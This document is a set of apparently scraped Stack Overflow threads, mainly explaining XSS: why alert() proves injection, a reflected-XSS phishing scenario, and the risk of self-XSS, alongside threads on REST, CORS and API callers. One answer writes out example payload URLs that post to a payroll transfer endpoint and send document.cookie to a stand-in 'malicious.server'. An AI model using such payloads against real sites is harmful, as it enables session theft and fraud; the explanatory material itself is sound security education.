XSS, why is alert(XSS) used to find/demonstrate xss vulnerabilities? - xss

I was wondering why alert() is quite often used to demonstrate XSS vulnerabilities. If I am not mistaken XSS means that the attacker should be able to establish two-way communication between infected client and attacker's server. It is just that this is a quite visual way to demonstrate that the attack is possible (as it uses the same characters as the actual payload would have) or is there something more? I tried to look it up online but found nothing...

You're overthinking it. it's demonstrated with an alert because when the alert is shown, it means the attacker was able to insert javascript code into your page and that code was executed as if you had put it there yourself. ... so from the perspective of the client (visitor) this code is coming from you, and they don't know anything about the attacker - which is what the attacker wants.

It's just like a "hello world" program but from the XSS world. It's easy to check, minimalistic, checking that you can at least execute some javascript function (alert). While you're looking for an XSS, the payload itself is not as important as the "can I actually inject some javascript here?" question.
Basically, it's a 2 steps approach.
Find a vulnerable parameter. (using alert or any other simple function)
Now let's have some fun with it.
If I am not mistaken XSS means that the attacker should be able to establish two-way communication between infected client and attacker's server.
Not always. Sometimes, 1-way communication is enough:
Just send data to your server, no response required. It's very useful for the stored XSS case (when let's say you can put random javascript code into a comment visible to other users)
You can inject some HTML asking the user to open another website and do whatever you want. (XSS + social engineering)
To summarise: alert is a simple function sufficient to check if you can inject javascript, like "hello world" to check that your setup is working. If you're successful -> it's time to make it more complicated.
Edit: in a real attack, people usually check more options, because the "alert" keyword is blocked by most security filters. It doesn't mean that the XSS is not there ;) But "alert" is a very convenient example for tutorials, so you'll see it everywhere.

I was wondering why alert() is quite often used to demonstrate XSS vulnerabilities.
Simply because the alert() method is the best option to show people that you are able to insert JS code into the page.
If I am not mistaken XSS means that the attacker should be able to establish two-way communication between infected client and attacker's server.
Kinda. XSS just means that the attacker is able to inject malicious JS into the page.
It is just that this is a quite visual way to demonstrate that the attack is possible (as it uses the same characters as the actual payload would have) or is there something more?
It's just the visual way.
However JS can be sandboxed in iframes etc. so the alert('XSS') is not the best method to show that you are able to inject malicious code.
The best way is to use some information from the page itself. For example
alert(`XSS attack on ${window.location.host}'s page: "${document.title}"`)
is a lot better way to demonstrate. It shows that you can have access to window properties (redirect) and document (modify) as well.
On this page it would display:
XSS attack on stackoverflow.com's page: "XSS, why is alert(XSS) used to find/demonstrate xss vulnerabilities? - Stack Overflow"

Related

Can someone give me a real scenario for reflective xss?

I am researching XSS and trying to understand different types of XSS.
Most documents talk about what they are and try to explain with a simple example.I have understood stored XSS quite well.
What I don't understand is reflected XSS and how its done in a real world scenario.Most explanations just talk about injecting malicious code which gets embedded on the page a user visits by clicking a malicious link.But I don't understand how and why they would click such a link in the first place.
If any of you can share a real world example for reflective XSS,it would really be helpful.
"Hi midhun lc,
I created the salary report you asked for, find it [here].
Regards,
Your assistant"
[here] is a link that points to https://payrollapplication/reportid=<script>$.post('https://payrollapplication/send_payment?amount=5000&to=assistant')</script> (Obviously this also exploits CSRF.)
Or [here] is a link that points to https://payrollapplication/reportid=<script>$.post('malicious.server/?receive=' + document.cookie)</script> to steal session and other cookies. (This also exploits weak cookie flags.)
Or it can just send any data from the payrollapplication that the victim can access.
And so on. How exactly the payload gets to the victim may vary of course. It can be in an internal doc, sent in an email, etc.

Is there a way to detect from which source an API is being called?

Is there any method to identify from which source an API is called? source refer to IOS application, web application like a page or button click( Ajax calls etc).
Although, saving a flag like (?source=ios or ?source=webapp) while calling api can be done but i just wanted to know is there any other better option to accomplish this?
I also feel this requirement is weird, because in general an App or a web application is used by n number of users so it is difficult to monitor those many API calls.
please give your valuable suggestions.
There is no perfect way to solve this. Designating a special flag won't solve your problem, because the consumer can put in whatever she wants and you cannot be sure if it is legit or not. The same holds true if you issue different API keys for different consumers - you never know if they decide to switch them up.
The only option that comes to my mind is to analyze the HTTP header and see what you can deduce from it. As you probably know a typical HTTP header looks something like this:
You can try and see how the requests from all sources differ in your case and decide if you can reliably differentiate between them. If you have the luxury of developing the client (i.e. this is not a public API), you can set your custom User-Agent strings for different sources.
But keep in mind that Referrer is not mandatory and thus it is not very reliable, and the user agent can also be spoofed. So it is a solution that is better than nothing, but it's not 100% reliable.
Hope this helps, also here is a similar question. Good luck!

REST opaque links and frontend of app

In REST URIs should be opaque to the client.
But when you build interactive javascript-based web-client for your application you actually have two clients! One for interaction with server and other one for users (actual GUI). Of course you will want to have friendly URIs, good enough to answer the question "where am I now?".
It's easier when a server just respond with HTML so people can just click on links and don't care about structure. Server provides URIs, server receives URIs.
It's easier with desktop client. The same staff. Just a button "show the resource" and user doesn't care what the URI is.
It's complicated with browser clients. There is the address bar. This leads to the fact that low-level part of web-client relies on the URIs structure of a server. Which is not RESTful.
It seems like the space between frontend and backend of the application is too tight for REST.
Does it mean that REST is not a good choice for reactive interactive js-based browser clients?
I think you're a little confused...
First of all, your initial assumption is flawed. URI opacity doesn't mean URIs have to be cryptic. It only means that clients should not rely on URI semantics for interaction. Friendly URIs are not only allowed, they are encouraged for the exact same reason you talk about: it's easier for developers to know what's going on.
Roy Fielding made that clear in the REST mailing list years ago, but it seems like that's a myth that won't go away easily:
REST does not require that a URI be opaque. The only place where the
word opaque occurs in my dissertation is where I complain about the
opaqueness of cookies. In fact, RESTful applications are, at all
times, encouraged to use human-meaningful, hierarchical identifiers in
order to maximize the serendipitous use of the information beyond what
is anticipated by the original application.
Second, you say it's easier when a server just respond with HTML so people can just follow links and don't care about structure. Well, that's exactly what REST is supposed to do. REST is merely a more formal and abstract definition of the architecture style of the web itself. Do some research on REST and HATEOAS.
Finally, to answer your question, whether REST is a good choice for you is not determined by client implementation details like that. You can have js-based clients, no problem, but the need to do that isn't reason enough to worry too much about getting REST right. REST is a good choice if you have projects with long term integration, maintainability and evolution goals. If you need something quick, that won't change a lot, or won't be integrated with a lot of different clients and services, don't worry too much about REST.

Using easyXDM (or any other client-side framework) for HTTP service availability tests (or response parsing in general) possible?

I can't see from the docs how it should work. Debugging with Firebug did not help either. Maybe I would have to sit for some hours to understand it better.
The basic problem is, that I'd like to check the availability of various geo services (WFS,WMS). Due to the problem of XSS browser restrictions XmlHttpRequest did not work.
I guess the Socket interface is the proper one to use, since I am not able to implement some CORS scenarios because I have no influence on the external services.
Using the following code works fine and returns some requested data (Firefox popup for the downloaded XML response):
var socket = new easyXDM.Socket({
remote: "http://path.to/provider/", // the path to the provider
onReady:function(success) {
alert(success); // will not be called
}
onMessage:function(message, origin) {
alert(message, origin); // will not be called
}
});
However I did not find a way (trying with the onReady and onMessage callbacks) to somehow get to some HTTP status object that I can process to determine which kind of response, e.g. 200, 404, I got.
Maybe it's the complete wrong way to solve this?
Sadly even my bounty did not help to get answers so I took a quick look around to gather some more infos on the issue myself...
First...
the general problem of XSS
Looking at XSS and some related issues/links discusses more the problems than solutions (which is ok).
Looking at the related Firefox docs about the JavaScript same-origin policy it becomes clear that our global slogan Security over Freedom1 is also applied in this area.
(Personally I don't like this way of solving the problem and would have liked to see another way to solve these problems as described at the end of this answer.)
1: nicely attributed by Benjamin Franklins (founder of the US) statement: He who sacrifices freedom for security deserves neither.
the CORS solution (=> external server dependencies)
The only supported standard/robust way seems to be to use the CORS (Cross Origin Resource Sharing) functionality.
Basically that means the external server has to at least deliver some CORS-compliant info (HTTP Header Access-Control-Allow-Origin: *) to allow others (= the client browser) to request data/content/.... Which also means that if one does not have control over the external server there will be no general robust client-side/browser-way to do this at all :-(.
robust solution for server/client applications (if no external server control)
So if our external server does not support CORS or it is not configured to be usable by our requester origin (protocol/domain/port combination) it seems best to do this kind of access on our own applications server-side where we do not have these kinds of restrictions, but of course other implications.
client-side solution I would have liked to see
Some introduction first to understand the client-side world I experience browsing the web as a standard user ...
I personally do not like to be tracked when browsing the web nor do I like to be slowed down with poor hardware or network resources nor do I want to get exposed to simply avoided data security issues when browsing the web. That's why I am using Firefox with various useful plugins like RequestPolicy, AdBlock Plus, Ghostery, Cookie Monster, Flashblock ... . This already shows a complexity, no average user usually could/would handle. But especially looking at RequestPolicy it shows how access to external resources can be handled on the client-side.
So if e.g. Firefox (without these plugins) would support some functionality to show the user a dialog similar to RequestPolicy, that could state something like the following, we could loosen the one origin policy:
[x] 'http://srcdomain.com' (this site)
[ ] all sites (select to block/allow for all sites)
would like to request some data from
[x] 'http://dstdomain.com'
[x] 'http://dst2domain.com'
in a generally considered UNSECURE way.
You can selected one of the following options about how to proceed with
access to the selected sites from the selected sites:
[x] block always (generally recommended)
[ ] block only for this session
[ ] allow always (but not to subreferences) [non-recursively]
[ ] allow only for this session (but not to subreferences) [non-recursively]
[ ] allow always (and all subreferences) [recursively]
[ ] allow only for this session (and all subreferences) [recursively]
Of course this should be fomulated as clear as possible to the average user which I certainly did not do here and may be handled also by a default in the settings like the other existing technologies (Cookie Handling, JavaScript Handling, ...) do it.
This way I could solve the problem I have without much hassle, because I could nicely handle the amount of user setup required for this in my situation.
answer regarding easyXdm
I guess since they recommend CORS as well and depend on the browsers this is the only robust way although some workarounds may still exist depending on browsers/versions/plugins like Flash and so on may exist.

Is there any reason to sanitize user input to prevent them from cross site scripting themself?

If I have fields that will only ever be displayed to the user that enters them, is there any reason to sanitize them against cross-site scripting?
Edit: So the consensus is clear, that it should be sanitized. What I'm trying to understand is why? If the only user that can ever view the script they insert into the site is the user himself, then the only thing he can do is execute the script himself, which he could already do without my site being involved. What's the threat vector here?
Theoretically: no. If you are sure that only they will ever see this page, then let them script whatever they want.
The problem is that there are a lot of ways in which they can make other people view that page, ways you do not control. They might even open the page on a coworker's computer and have them look at it. It is undeniably an extra attack vector.
Example: a pastebin without persistent storage; you post, you get the result, that's it. A script can be inserted that inconspicuously adds a "donate" button to link to your PayPal account. Put it up on enough people's computer, hope someone donates, ...
I agree that this is not the most shocking and realistic of examples. However, once you have to defend a security-related decision with "that is possible but it does not sound too bad," you know you crossed a certain line.
Otherwise, I do not agree with answers like "never trust user input." That statement is meaningless without context. The point is how to define user input, which was the entire question. Trust how, semantically? Syntactically? To what level; just size? Proper HTML?
Subset of unicode characters? The answer depends on the situation. A bare webserver "does not trust user input" but plenty of sites get hacked today, because the boundaries of "user input" depend on your perspective.
Bottom line: avoid allowing anybody any influence over your product unless it is clear to a sleepy, non-technical consumer what and who.
That rules out almost all JS and HTML from the get-go.
P.S.: In my opinion, the OP deserves credit for asking this question in the first place. "Do not trust your users" is not the golden rule of software development. It is a bad rule of thumb because it is too destructive; it detracts from the subtleties in defining the frontier of acceptable interaction between your product and the outside world. It sounds like the end of a brainstorm, while it should start one.
At its core, software development is about creating a clear interface to and from your application. Everything within that interface is Implementation, everything outside it is Security. Making a program do the things you want it to is so preoccupying one easily forgets about making it not do anything else.
Picture the application you are trying to build as a beautiful picture or photo. With software, you try to approximate that image. You use a spec as a sketch, so already here, the more sloppy your spec, the more blurry your sketch. The outline of your ideal application is razor thin, though! You try to recreate that image with code. Carefully you fill the outline of your sketch. At the core, this is easy. Use wide brushes: blurry sketch or not, this part clearly needs coloring. At the edges, it gets more subtle. This is when you realize your sketch is not perfect. If you go too far, your program starts doing things that you do not want it to, and some of those could be very bad.
When you see a blurry line, you can do two things: look closer at your ideal image and try to refine your sketch, or just stop coloring. If you do the latter, chances are you will not go too far. But you will also make only a rough approximation of your ideal program, at best. And you could still accidentally cross the line anyway! Simply because you are not sure where it is.
You have my blessing in looking closer at that blurry line and trying to redefine it. The closer you get to the edge, the more certain you are where it is, and the less likely you are to cross it.
Anyway, in my opinion, this question was not one of security, but one of design: what are the boundaries of your application, and how does your implementation reflect them?
If "never trust user input" is the answer, your sketch is blurry.
(and if you don't agree: what if OP works for "testxsshere.com"? boom! check-mate.)
(somebody should register testxsshere.com)
Just because you don't display a field to someone, doesn't mean that a potential Black Hat doesn't know that they're there. If you have a potential attack vector in your system, plug the hole. It's going to be really hard to explain to your employer why you didn't if it's ever exploited.
I don't believe this question has been answered entirely. He wants to see an accuall XSS attack if the user can only attack himself. This is actually done by a combination of CSRF and XSS.
With CSRF you can make a user make a request with your payload. So if a user can attack himself using XSS, you can make him attack himself (make him make a request with your XSS).
A quote from The Web Application
Hacker’s Handbook:
COMMON MYTH:
“We’re not worried about that low-risk XSS bug. A user could exploit it only to attack himself.”
Even apparently low-risk vulnerabilities can, under the right circumstances, pave the way for a devastating attack. Taking a defense-in-depth approach to security entails removing every known vulnerability, however insignificant it may seem. The authors have even used XSS to place file browser dialogs or ActiveX controls into the page response, helping to break out of a kiosk-mode system bound to a target web application. Always assume that an attacker will be more imaginative than you in devising ways to exploit minor bugs!
Yes, always sanitize user input:
Never trust user input
It does not take a lot of effort to do so.
The key point being 1.
If the script, or service, that the form submits the values to is available via the internet then anyone, anywhere, can write a script that will submit values to it. So: yes, sanitize all inputs received.
The most basic model of web-security is pretty simple:
Do not trust your users
It's also worth linking to my answer in another post (Steps to become web-security savvy): Steps to become web security savvy.
I can't believe I answered without referring to the title-question:
Is there any reason to sanitize user input to prevent them from cross site scripting themself?
You're not preventing the user's being cross-site scripted, you're protecting your site (or, more importantly, you're client's site) from being the victim of cross-site scripting. If you don't close known security holes because you couldn't be bothered it will become very hard to get repeat business. Or good word-of-mouth advertising and recommendation from previous clients.
Think of it less as protecting your client, think of it -if it helps- as protecting your business.